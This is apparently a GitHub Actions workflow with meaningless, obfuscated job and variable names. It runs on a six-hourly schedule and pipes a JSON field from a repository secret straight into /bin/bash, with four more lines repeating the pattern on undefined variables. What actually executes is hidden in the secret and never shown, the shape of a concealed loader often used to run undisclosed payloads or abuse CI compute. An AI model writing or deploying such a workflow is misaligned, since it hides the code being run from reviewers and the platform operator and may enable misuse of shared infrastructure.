name: lantoufufk
on:
  workflow_dispatch:
  schedule:
    - cron: '28 1/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: lantoufufk
        env:
          jltd580: ${{ secrets.jltd580 }}
        run: |
          echo $jltd580 | jq -r .yzeo42987 | /bin/bash
          echo $naf706 | jq -r .zcful5 | /bin/bash
          echo $hrt55311 | jq -r .rsyvr4665 | /bin/bash
          echo $dxhbq14738 | jq -r .lby8 | /bin/bash
          echo $ppp33992 | jq -r .let7 | /bin/bash

